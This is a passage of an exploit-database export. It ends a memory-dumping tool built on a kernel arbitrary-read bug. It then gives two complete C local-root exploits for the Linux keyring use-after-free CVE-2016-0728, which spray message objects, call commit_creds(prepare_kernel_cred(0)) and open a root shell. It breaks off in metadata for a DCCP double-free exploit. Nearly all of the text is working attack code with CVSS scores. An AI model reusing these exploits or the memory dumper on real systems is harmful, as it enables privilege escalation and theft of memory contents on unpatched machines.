PAGE_OFFSET_BASE) {\n\t\t\tinfo(\"[-] mmap sanity check failed (wrong offset?)\\n\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t} else {\n\t\tmm = g_kernel_text + O_INIT_MM;\n\t}\n\n\tunsigned long pgd = read_field_8(mm, O_MM_STRUCT_PGD);\n\tinfo(\"[.] task->mm->pgd: %016lx\\n\", pgd);\n\tif (pgd < PAGE_OFFSET_BASE) {\n\t\tinfo(\"[-] pgd sanity check failed (wrong offset?)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tptsc_init(&g_ptsc, g_physmap, pgd);\n}\n\nstatic unsigned long page_virt_to_phys(unsigned long addr) {\n\tunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr);\n\tassert(paddr != 0);\n\treturn paddr - g_physmap;\n}\n\nstatic bool page_check_virt(unsigned long addr) {\n\tunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr);\n\treturn paddr != 0;\n}\n\nstatic bool page_check_phys(unsigned long offset) {\n\treturn page_check_virt(g_physmap + offset);\n}\n\nstatic void phys_read_range(unsigned long offset, size_t length, char *buffer) {\n\tread_range(g_physmap + offset, length, buffer);\n}\n\nstatic void for_each_mmap(mmap_callback callback, void *private) {\n\tfor_each_mmap_from(g_mmap, callback, private);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic int create_file(const char *path) {\n\tint fd = open(path, O_RDWR | O_CREAT, 0644);\n\tif (fd < 0) {\n\t\tperror(\"[-] open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic int open_dir(const char *path) {\n\tint fd = open(path, O_DIRECTORY | O_PATH);\n\tif (fd < 0) {\n\t\tperror(\"[-] open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic int create_file_in_dir(int dirfd, const char *name) {\n\tint fd = openat(dirfd, name, O_RDWR | O_CREAT, 0644);\n\tif (fd < 0) {\n\t\tperror(\"[-] openat()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn fd;\n}\n\nstatic void write_file(int fd, char *buffer, size_t length) {\n\tint rv = write(fd, buffer, length);\n\tif (rv != length) {\n\t\tperror(\"[-] write()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void write_bytes(int fd, unsigned long src_addr,\n\t\t\tchar *buffer, size_t length) {\n\tif (fd < 0)\n\t\tprint_bytes(LOG_INFO, src_addr, buffer, length);\n\telse\n\t\twrite_file(fd, buffer, length);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nvoid read_virt_memory(unsigned long addr, size_t length, int fd) {\n\tchar buffer[PAGE_SIZE];\n\tchar empty[PAGE_SIZE];\n\n\tdebug1(\"read_virt_memory: addr = %016lx, length = %016lx\\n\",\n\t\t\taddr, length);\n\n\tmemset(&empty[0], 0, sizeof(empty));\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tunsigned long current = addr + total_read;\n\t\tsize_t to_read = PAGE_SIZE;\n\t\tif (current % PAGE_SIZE != 0)\n\t\t\tto_read = PAGE_SIZE - current % PAGE_SIZE;\n\t\tto_read = min(to_read, length - total_read);\n\t\tif (page_check_virt(addr + total_read)) {\n\t\t\tread_range(addr + total_read, to_read, &buffer[0]);\n\t\t\twrite_bytes(fd, addr + total_read, &buffer[0], to_read);\n\t\t} else {\n\t\t\twrite_bytes(fd, addr + total_read, &empty[0], to_read);\n\t\t}\n\t\ttotal_read += to_read;\n\t}\n}\n\nvoid read_phys_memory(unsigned long src_addr, unsigned long offset,\n\t\t\tsize_t length, int fd) {\n\tchar buffer[PAGE_SIZE];\n\tchar empty[PAGE_SIZE];\n\n\tdebug1(\"read_phys_memory: offset = %016lx, length = %016lx\\n\",\n\t\t\toffset, length);\n\n\tmemset(&empty[0], 0, sizeof(empty));\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tunsigned long current = offset + total_read;\n\t\tsize_t to_read = PAGE_SIZE;\n\t\tif (current % PAGE_SIZE != 0)\n\t\t\tto_read = PAGE_SIZE - current % PAGE_SIZE;\n\t\tto_read = min(to_read, length - total_read);\n\t\tif (page_check_phys(offset + total_read)) {\n\t\t\tphys_read_range(offset + total_read, to_read,\n\t\t\t\t\t\t&buffer[0]);\n\t\t\twrite_bytes(fd, src_addr + offset + total_read,\n\t\t\t\t\t&buffer[0], to_read);\n\t\t} else {\n\t\t\twrite_bytes(fd, src_addr + offset + total_read,\n\t\t\t\t\t&empty[0], to_read);\n\t\t}\n\t\ttotal_read += to_read;\n\t}\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define VM_READ\t\t0x00000001\n#define VM_WRITE\t0x00000002\n#define VM_EXEC\t\t0x00000004\n\nstatic void print_mmap(unsigned long start, unsigned long end, unsigned flags) {\n\tinfo(\"[%016lx, %016lx) %s%s%s\\n\",\n\t\tstart, end,\n\t\t(flags & VM_READ) ? \"r\" : \"-\",\n\t\t(flags & VM_WRITE) ? \"w\" : \"-\",\n\t\t(flags & VM_EXEC) ? \"x\" : \"-\");\n}\n\nstatic void name_mmap(unsigned long start, unsigned long end, unsigned flags,\n\t\t\tchar *buffer, size_t length) {\n\tsnprintf(buffer, length, \"%016lx_%016lx_%s%s%s\",\n\t\tstart, end,\n\t\t(flags & VM_READ) ? \"r\" : \"-\",\n\t\t(flags & VM_WRITE) ? \"w\" : \"-\",\n\t\t(flags & VM_EXEC) ? \"x\" : \"-\");\n}\n\nstatic void save_mmap(struct mmap_entry *entry, void *private) {\n\tint dirfd = (int)(unsigned long)private;\n\tunsigned long length;\n\tchar name[128];\n\tchar empty[PAGE_SIZE];\n\n\tassert(entry->start % PAGE_SIZE == 0);\n\tassert(entry->end % PAGE_SIZE == 0);\n\n\tmemset(&empty, 0, sizeof(empty));\n\tlength = entry->end - entry->start;\n\n\tprint_mmap(entry->start, entry->end, entry->flags);\n\tname_mmap(entry->start, entry->end, entry->flags,\n\t\t\t&name[0], sizeof(name));\n\tint fd = create_file_in_dir(dirfd, &name[0]);\n\n\tsize_t total_read = 0;\n\twhile (total_read < length) {\n\t\tif (page_check_virt(entry->start + total_read)) {\n\t\t\tunsigned long offset = page_virt_to_phys(\n\t\t\t\tentry->start + total_read);\n\t\t\tread_phys_memory(entry->start + total_read, offset,\n\t\t\t\t\t\tPAGE_SIZE, fd);\n\t\t} else {\n\t\t\twrite_bytes(fd, entry->start + total_read,\n\t\t\t\t\t&empty[0], PAGE_SIZE);\n\t\t}\n\t\ttotal_read += PAGE_SIZE;\n\t}\n\n\tclose(fd);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nunsigned long get_phys_size() {\n\tstruct sysinfo info;\n\tint rv = sysinfo(&info);\n\tif (rv != 0) {\n\t\tperror(\"sysinfo()\");\n\t\treturn EXIT_FAILURE;\n\t}\n\tdebug1(\"phys size: %016lx\\n\", info.totalram);\n\treturn info.totalram;\n}\n\nvoid phys_search(unsigned long start, unsigned long end, char *needle) {\n\tchar buffer[PAGE_SIZE];\n\tint length = strlen(needle);\n\n\tassert(length <= PAGE_SIZE);\n\n\tunsigned long offset;\n\tfor (offset = start; offset < end; offset += PAGE_SIZE) {\n\t\tif (offset % (32ul << 20) == 0)\n\t\t\tinfo(\"[.] now at %016lx\\n\", offset);\n\t\tif (!page_check_phys(offset))\n\t\t\tcontinue;\n\t\tphys_read_range(offset, length,\t&buffer[0]);\n\t\tif (memcmp(&buffer[0], needle, length) != 0)\n\t\t\tcontinue;\n\t\tinfo(\"[+] found at %016lx\\n\", offset);\n\t\treturn;\n\t}\n\tinfo(\"[-] not found\\n\");\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define CMD_IDT\t\t1\n#define CMD_PID\t\t2\n#define CMD_VIRT\t3\n#define CMD_PHYS\t4\n#define CMD_SEARCH\t5\n\nint g_cmd = 0;\n\nstatic unsigned g_num = 1;\nstatic unsigned g_pid = 0;\nstatic unsigned long g_addr = 0;\nstatic unsigned long g_length = 0;\nstatic unsigned long g_offset = 0;\nstatic const char *g_dir = NULL;\nstatic const char *g_file = NULL;\nstatic char *g_string = NULL;\n\nstatic void print_usage(const char* name) {\n\tinfo(\"Usage: \\n\");\n\tinfo(\" %s idt [NUM] \"\n\t\t\t\"dump IDT entries\\n\", name);\n\tinfo(\" %s pid PID DIR \"\n\t\t\t\"dump process memory\\n\", name);\n\tinfo(\" %s virt ADDR LENGTH [FILE] \"\n\t\t\t\"dump virtual memory\\n\", name);\n\tinfo(\" %s phys OFFSET LENGTH [FILE] \"\n\t\t\t\"dump physical memory\\n\", name);\n\tinfo(\" %s search STRING [OFFSET [LENGTH]] \"\n\t\t\t\"search start of each physical page\\n\", name);\n\tinfo(\"\\n\");\n\tinfo(\" NUM, PID - decimals\\n\");\n\tinfo(\" ADDR, LENGTH, OFFSET - hex\\n\");\n\tinfo(\" DIR, FILE, STRING - strings\\n\");\n}\n\nstatic bool parse_u(char *s, int base, unsigned *out) {\n\tint length = strlen(s);\n\tchar *endptr = NULL;\n\tunsigned long result = strtoul(s, &endptr, base);\n\tif (endptr != s + length)\n\t\treturn false;\n\t*out = result;\n\treturn true;\n}\n\nstatic bool parse_ul(char *s, int base, unsigned long *out) {\n\tint length = strlen(s);\n\tchar *endptr = NULL;\n\tunsigned long result = strtoul(s, &endptr, base);\n\tif (endptr != s + length)\n\t\treturn false;\n\t*out = result;\n\treturn true;\n}\n\nstatic int parse_cmd(const char *cmd) {\n\tif (strcmp(cmd, \"idt\") == 0)\n\t\treturn CMD_IDT;\n\tif (strcmp(cmd, \"pid\") == 0)\n\t\treturn CMD_PID;\n\tif (strcmp(cmd, \"virt\") == 0)\n\t\treturn CMD_VIRT;\n\tif (strcmp(cmd, \"phys\") == 0)\n\t\treturn CMD_PHYS;\n\tif (strcmp(cmd, \"search\") == 0)\n\t\treturn CMD_SEARCH;\n\treturn 0;\n}\n\nstatic bool parse_args(int argc, char **argv) {\n\tif (argc < 2)\n\t\treturn false;\n\n\tg_cmd = parse_cmd(argv[1]);\n\n\tswitch (g_cmd) {\n\tcase CMD_IDT:\n\t\tif (argc > 3)\n\t\t\treturn false;\n\t\tif (argc >= 3 && !parse_u(argv[2], 10, &g_num))\n\t\t\treturn false;\n\t\treturn true;\n\tcase CMD_PID:\n\t\tif (argc != 4)\n\t\t\treturn false;\n\t\tif (!parse_u(argv[2], 10, &g_pid))\n\t\t\treturn false;\n\t\tif (g_pid <= 0)\n\t\t\treturn false;\n\t\tg_dir = argv[3];\t\n\t\tdebug1(\"CMD_PID %u %s\\n\", g_pid, g_dir);\n\t\treturn true;\n\tcase CMD_VIRT:\n\t\tif (argc < 4 || argc > 5)\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[2], 16, &g_addr))\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[3], 16, &g_length))\n\t\t\treturn false;\n\t\tif (argc == 5)\n\t\t\tg_file = argv[4];\n\t\tdebug1(\"CMD_VIRT %016lx %016lx %s\\n\", g_addr,\n\t\t\t\tg_length, g_file ? g_file : \"NULL\");\n\t\treturn true;\n\tcase CMD_PHYS:\n\t\tif (argc < 4 || argc > 5)\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[2], 16, &g_offset))\n\t\t\treturn false;\n\t\tif (!parse_ul(argv[3], 16, &g_length))\n\t\t\treturn false;\n\t\tif (argc == 5)\n\t\t\tg_file = argv[4];\n\t\tdebug1(\"CMD_PHYS %016lx %016lx %s\\n\", g_offset,\n\t\t\t\tg_length, g_file ? g_file : \"NULL\");\n\t\treturn true;\n\tcase CMD_SEARCH:\n\t\tif (argc < 3 || argc > 5)\n\t\t\treturn false;\n\t\tg_string = argv[2];\n\t\tif (argc >= 4 && !parse_ul(argv[3], 16, &g_offset))\n\t\t\treturn false;\n\t\tif (argc >= 5 && !parse_ul(argv[4], 16, &g_length))\n\t\t\treturn false;\n\t\tdebug1(\"CMD_SEARCH <%s> %016lx %016lx\\n\",\n\t\t\t\tg_string, g_offset, g_length);\n\t\treturn true;\n\tdefault:\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nvoid handle_cmd_idt() {\n\tinfo(\"[.] dumping IDT\\n\");\n\tprint_idt(g_num);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_virt() {\n\tint fd = -1;\n\tinfo(\"[.] dumping virtual memory [%016lx, %016lx):\\n\",\n\t\tg_addr, g_addr + g_length);\n\tif (g_file != NULL)\n\t\tfd = create_file(g_file);\n\tread_virt_memory(g_addr, g_length, fd);\n\tif (fd != -1)\n\t\tclose(fd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_phys() {\n\tint fd = -1;\n\tinfo(\"[.] dumping physical memory [%016lx, %016lx):\\n\",\n\t\tg_offset, g_offset + g_length);\n\tif (g_file != NULL)\n\t\tfd = create_file(g_file);\n\tread_phys_memory(0, g_offset, g_length, fd);\n\tif (fd != -1)\n\t\tclose(fd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_pid() {\n\tinfo(\"[.] dumping mmaps for %u:\\n\", g_pid);\n\tint dirfd = open_dir(g_dir);\n\tfor_each_mmap(save_mmap, (void *)(unsigned long)dirfd);\n\tclose(dirfd);\n\tinfo(\"[+] done\\n\");\n}\n\nvoid handle_cmd_search() {\n\tunsigned long start = g_offset ? g_offset : 0;\n\tunsigned long end = g_length ? (start + g_length) : get_phys_size();\n\tinfo(\"[.] searching [%016lx, %016lx) for '%s':\\n\",\n\t\t\tstart, end, g_string);\n\tphys_search(start, end, g_string);\n\tinfo(\"[+] done\\n\");\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nint main(int argc, char **argv) {\n\tassert(getpagesize() == PAGE_SIZE);\n\n\tif (!parse_args(argc, argv)) {\n\t\tprint_usage(argv[0]);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tarbitrary_read_init();\n\n\tif (g_cmd == CMD_IDT) {\n\t\thandle_cmd_idt();\n\t\treturn EXIT_SUCCESS;\n\t}\n\n\tphysmap_init();\n\n\tswitch (g_cmd) {\n\tcase CMD_VIRT:\n\t\tpts_init(getpid());\n\t\thandle_cmd_virt();\n\t\tbreak;\n\tcase CMD_PHYS:\n\t\tpts_init(0);\n\t\thandle_cmd_phys();\n\t\tbreak;\n\tcase CMD_SEARCH:\n\t\tpts_init(0);\n\t\thandle_cmd_search();\n\t\tbreak;\n\tcase CMD_PID:\n\t\tpts_init(g_pid);\n\t\thandle_cmd_pid();\n\t\tbreak;\n\t}\n\n\treturn EXIT_SUCCESS;\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */\n/* $ ./cve_2016_072 PP_KEY */\n\n/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff81094250)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n\tconst char *keyring_name;\n\tsize_t i = 0;\n unsigned long int l = 0x100000000/2;\n\tkey_serial_t serial = -1;\n\tpid_t pid = -1;\n struct key_type * my_key_type = NULL;\n \nstruct { long mtype;\n\t\tchar mtext[STRUCT_LEN];\n\t} msg = {0x4141414141414141, {0}};\n\tint msqid;\n\n\tif (argc != 2) {\n\t\tputs(\"usage: ./keys <key_name>\");\n\t\treturn 1;\n\t}\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \n commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;\n \n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n\t/* Set the new session keyring before we start */\n\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n\tif (serial < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n }\n\t\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n\t\tperror(\"keyctl\");\n\t\treturn -1;\n\t}\n\n\n\tputs(\"Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n }\n\n puts(\"finished increfing\");\n puts(\"forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n \n puts(\"finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "href": "", "sourceData": "/*\n# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\n# Date: 19/1/2016\n# Exploit Author: Perception Point Team\n# CVE : CVE-2016-0728\n*/\n\n/* CVE-2016-0728 local root exploit\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\n props to grsecurity/PaX for preventing this in so many ways\n\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\n $ ./cve_2016_072 PP_KEY */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/types.h>\n#include <keyutils.h>\n#include <unistd.h>\n#include <time.h>\n#include <unistd.h>\n\n#include <sys/ipc.h>\n#include <sys/msg.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\n#define STRUCT_LEN (0xb8 - 0x30)\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\n\n\n\nstruct key_type {\n char * name;\n size_t datalen;\n void * vet_description;\n void * preparse;\n void * free_preparse;\n void * instantiate;\n void * update;\n void * match_preparse;\n void * match_free;\n void * revoke;\n void * destroy;\n};\n\n/* thanks spender - Federico Bento */\nstatic unsigned long get_kernel_sym(char *name)\n{\n FILE *f;\n unsigned long addr;\n char dummy;\n char sname[256];\n int ret;\n\n f = fopen(\"/proc/kallsyms\", \"r\");\n if (f == NULL) {\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\n exit(0);\n }\n\n ret = 0;\n while(ret != EOF) {\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n if (ret == 0) {\n fscanf(f, \"%s\\n\", sname);\n continue;\n }\n if (!strcmp(name, sname)) {\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\n fclose(f);\n return addr;\n }\n }\n\n fclose(f);\n return 0;\n}\n\nvoid userspace_revoke(void * key) {\n commit_creds(prepare_kernel_cred(0));\n}\n\nint main(int argc, const char *argv[]) {\n const char *keyring_name;\n size_t i = 0;\n unsigned long int l = 0x100000000/2;\n key_serial_t serial = -1;\n pid_t pid = -1;\n struct key_type * my_key_type = NULL;\n\n struct {\n long mtype;\n char mtext[STRUCT_LEN];\n } msg = {0x4141414141414141, {0}};\n int msqid;\n\n if (argc != 2) {\n puts(\"usage: ./keys <key_name>\");\n return 1;\n }\n\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\n }\n\n my_key_type = malloc(sizeof(*my_key_type));\n\n my_key_type->revoke = (void*)userspace_revoke;\n memset(msg.mtext, 'A', sizeof(msg.mtext));\n\n // key->uid\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\n //key->perm\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\n\n //key->type\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\n\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"msgget\");\n exit(1);\n }\n\n keyring_name = argv[1];\n\n /* Set the new session keyring before we start */\n\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\n if (serial < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\n perror(\"keyctl\");\n return -1;\n }\n\n\n puts(\"[+] Increfing...\");\n for (i = 1; i < 0xfffffffd; i++) {\n if (i == (0xffffffff - l)) {\n l = l/2;\n sleep(5);\n }\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n sleep(5);\n /* here we are going to leak the last references to overflow */\n for (i=0; i<5; ++i) {\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\n perror(\"[-] keyctl\");\n return -1;\n }\n }\n\n puts(\"[+] Finished increfing\");\n puts(\"[+] Forking...\");\n /* allocate msg struct in the kernel rewriting the freed keyring object */\n for (i=0; i<64; i++) {\n pid = fork();\n if (pid == -1) {\n perror(\"[-] fork\");\n return -1;\n }\n\n if (pid == 0) {\n sleep(2);\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\n perror(\"[-] msgget\");\n exit(1);\n }\n for (i = 0; i < 64; i++) {\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\n perror(\"[-] msgsnd\");\n exit(1);\n }\n }\n sleep(-1);\n exit(1);\n }\n }\n\n puts(\"[+] Finished forking\");\n sleep(5);\n\n /* call userspace_revoke from kernel */\n puts(\"[+] Caling revoke...\");\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\n perror(\"[+] keyctl_revoke\");\n }\n\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\n\n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-26T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 